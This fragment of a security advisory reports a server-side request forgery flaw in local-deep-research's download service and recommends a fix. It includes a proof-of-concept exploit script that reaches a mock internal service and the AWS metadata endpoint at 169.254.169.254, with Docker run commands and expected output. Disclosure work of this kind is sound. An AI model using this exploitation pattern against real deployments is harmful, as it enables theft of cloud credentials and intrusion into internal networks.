+ "details": "## Summary\n\nThe download service (`download_service.py`) makes HTTP requests using raw `requests.get()` without utilizing the application's SSRF protection (`safe_requests.py`). This can allow attackers to access internal services and attempt to reach cloud provider metadata endpoints (AWS/GCP/Azure), as well as perform internal network reconnaissance, by submitting malicious URLs through the API, depending on the deployment and surrounding controls.\n\n**CWE**: CWE-918 (Server-Side Request Forgery)\n\n---\n\n## Details\n\n### Vulnerable Code Location\n\n**File**: `src/local_deep_research/research_library/services/download_service.py`\n\nThe application has proper SSRF protection implemented in `security/safe_requests.py` and `security/ssrf_validator.py`, which blocks:\n- Loopback addresses (127.0.0.0/8)\n- Private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)\n- AWS metadata endpoint (169.254.169.254)\n- Link-local addresses\n\nHowever, `download_service.py` bypasses this protection by using raw `requests.get()` directly:\n\n```python\n# Line 1038 - _download_generic method\nresponse = requests.get(url, headers=headers, timeout=30)\n\n# Line 1075\nresponse = requests.get(api_url, timeout=10)\n\n# Line 1100\npdf_response = requests.get(pdf_url, headers=headers, timeout=30)\n\n# Line 1144\nresponse = requests.get(europe_url, headers=headers, timeout=30)\n\n# Line 1187\napi_response = requests.get(elink_url, params=params, timeout=10)\n\n# Line 1207\nsummary_response = requests.get(esummary_url, ...)\n\n# Line 1236\nresponse = requests.get(europe_url, headers=headers, timeout=30)\n\n# Line 1276\nresponse = requests.get(url, headers=headers, timeout=10)\n\n# Line 1298\nresponse = requests.get(europe_url, headers=headers, timeout=30)\n```\n\n### Attack Vector\n\n1. Attacker submits a malicious URL via `POST /api/resources/<research_id>`\n2. URL is stored in database without SSRF validation (`resource_service.py:add_resource()`)\n3. 
Download is triggered via `/library/api/download/<resource_id>`\n4. `download_service.py` fetches the URL using raw `requests.get()`, bypassing SSRF protection\n\n---\n\n## PoC\n\n### Prerequisites\n\n- Docker and Docker Compose installed\n- Python 3.11+\n\n### Step 1: Create the Mock Internal Service\n\n**File: `internal_service.py`**\n\n```python\n#!/usr/bin/env python3\n\"\"\"Mock internal service that simulates a sensitive internal endpoint.\"\"\"\n\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nimport json\n\nclass InternalServiceHandler(BaseHTTPRequestHandler):\n    def log_message(self, format, *args):\n        print(f\"[INTERNAL SERVICE] {args[0]}\")\n\n    def do_GET(self):\n        # Any GET reaching this handler means the request crossed into the internal network\n        print(f\"\\n{'='*60}\")\n        print(f\"[!] SSRF DETECTED - Internal service accessed!\")\n        print(f\"[!] Path: {self.path}\")\n        print(f\"{'='*60}\\n\")\n\n        self.send_response(200)\n        self.send_header(\"Content-Type\", \"application/json\")\n        self.end_headers()\n\n        # Dummy secrets, used only to make a successful read obvious\n        secret_data = {\n            \"status\": \"SSRF_SUCCESSFUL\",\n            \"message\": \"You have accessed internal service via SSRF!\",\n            \"internal_secrets\": {\n                \"database_password\": \"super_secret_db_pass_123\",\n                \"api_key\": \"sk-internal-api-key-xxxxx\",\n                \"admin_token\": \"admin_bearer_token_yyyyy\"\n            }\n        }\n        self.wfile.write(json.dumps(secret_data, indent=2).encode())\n\nif __name__ == \"__main__\":\n    print(\"[*] Starting mock internal service on port 8080\")\n    server = HTTPServer((\"0.0.0.0\", 8080), InternalServiceHandler)\n    server.serve_forever()\n```\n\n### Step 2: Create the Exploit Script\n\n**File: `exploit.py`**\n\n```python\n#!/usr/bin/env python3\n\"\"\"SSRF Vulnerability Active PoC\"\"\"\n\nimport sys\nimport requests\n\nsys.path.insert(0, '/app/src')\n\ndef main():\n    print(\"=\" * 70)\n    print(\"SSRF Vulnerability PoC - Active Exploitation\")\n    print(\"=\" * 70)\n\n    internal_url = \"http://ssrf-internal-service:8080/secret-data\"\n    aws_metadata_url = \"http://169.254.169.254/latest/meta-data/\"\n    headers = {\"User-Agent\": 
\"Mozilla/5.0\"}\n\n    # EXPLOIT 1: Access internal service\n    print(\"\\n[EXPLOIT 1] Accessing internal service via SSRF\")\n    print(f\" Target: {internal_url}\")\n\n    try:\n        # Same pattern as download_service.py line 1038\n        response = requests.get(internal_url, headers=headers, timeout=30)\n        print(f\" [!] SSRF SUCCESSFUL! Status: {response.status_code}\")\n        print(f\" [!] Retrieved secrets:\")\n        for line in response.text.split('\\n')[:15]:\n            print(f\" {line}\")\n    except Exception as e:\n        print(f\" [-] Failed: {e}\")\n        return 1\n\n    # EXPLOIT 2: AWS metadata bypass\n    print(\"\\n[EXPLOIT 2] AWS Metadata endpoint bypass\")\n    from local_deep_research.security.ssrf_validator import validate_url\n    print(f\" SSRF validator: {'ALLOWED' if validate_url(aws_metadata_url) else 'BLOCKED'}\")\n    print(f\" But download_service.py BYPASSES the validator!\")\n\n    try:\n        requests.get(aws_metadata_url, timeout=5)\n    except requests.exceptions.RequestException:\n        # A connection error or timeout is expected outside a cloud instance;\n        # the point is that the request was attempted without validation\n        print(f\" Request sent without SSRF validation!\")\n\n    print(\"\\n\" + \"=\" * 70)\n    print(\"SSRF VULNERABILITY CONFIRMED\")\n    print(\"=\" * 70)\n    return 0\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n```\n\n### Step 3: Run the PoC\n\n```bash\n# Run with Docker (assumes the ssrf-vulnerable-app image is already built)\ndocker network create ssrf-poc-net\n# The mock service uses only the standard library, so it is mounted and run directly\ndocker run -d --name ssrf-internal-service --network ssrf-poc-net -v \"$(pwd)/internal_service.py:/internal_service.py:ro\" python:3.11-slim python /internal_service.py\ndocker run --rm --network ssrf-poc-net -v \"$(pwd)/src:/app/src\" ssrf-vulnerable-app python exploit.py\n```\n\n### Expected Output\n\n```\n======================================================================\nSSRF Vulnerability PoC - Active Exploitation\n======================================================================\n\n[EXPLOIT 1] Accessing internal service via SSRF\n Target: http://ssrf-internal-service:8080/secret-data\n [!] SSRF SUCCESSFUL! Status: 200\n [!] 
Retrieved secrets:\n {\n \"status\": \"SSRF_SUCCESSFUL\",\n \"message\": \"You have accessed internal service via SSRF!\",\n \"internal_secrets\": {\n \"database_password\": \"super_secret_db_pass_123\",\n \"api_key\": \"sk-internal-api-key-xxxxx\",\n \"admin_token\": \"admin_bearer_token_yyyyy\"\n }\n }\n\n[EXPLOIT 2] AWS Metadata endpoint bypass\n SSRF validator: BLOCKED\n But download_service.py BYPASSES the validator!\n Request sent without SSRF validation!\n\n======================================================================\nSSRF VULNERABILITY CONFIRMED\n======================================================================\n```\n\n---\n\n## Impact\n\n### Who is affected?\n\nAll users running local-deep-research in:\n- **Cloud environments** (AWS, GCP, Azure) - attackers can steal cloud credentials via metadata endpoints\n- **Corporate networks** - attackers can access internal services and databases\n- **Any deployment** - attackers can scan internal networks\n\n### What can an attacker do?\n\n| Attack | Impact |\n|--------|--------|\n| Access cloud metadata | Potentially access IAM credentials, API keys, or instance identity in certain cloud configurations |\n| Internal service access | Read sensitive data from databases, Redis, admin panels |\n| Network reconnaissance | Map internal network topology and services |\n| Bypass firewalls | Access services not exposed to the internet |\n\n---\n\n## Recommended Fix\n\nReplace all `requests.get()` calls in `download_service.py` with `safe_get()` from `security/safe_requests.py`:\n\n```diff\n# download_service.py\n\n+ from ...security.safe_requests import safe_get\n\n def _download_generic(self, url, ...):\n- response = requests.get(url, headers=headers, timeout=30)\n+ response = safe_get(url, headers=headers, timeout=30)\n```\n\nThe `safe_get()` function already validates URLs against SSRF attacks before making requests.\n\n### Files to update:\n- 
`src/local_deep_research/research_library/services/download_service.py` (9 occurrences)\n- `src/local_deep_research/research_library/downloaders/base.py` (uses `requests.Session`)\n\n---\n\n## References\n\n- [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html)\n- [OWASP SSRF Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n- [AWS SSRF Attacks and IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html)\n- [PortSwigger: SSRF](https://portswigger.net/web-security/ssrf)\n\n---\n\nThank you for your work on this project! I'm happy to provide any additional information or help with testing the fix.",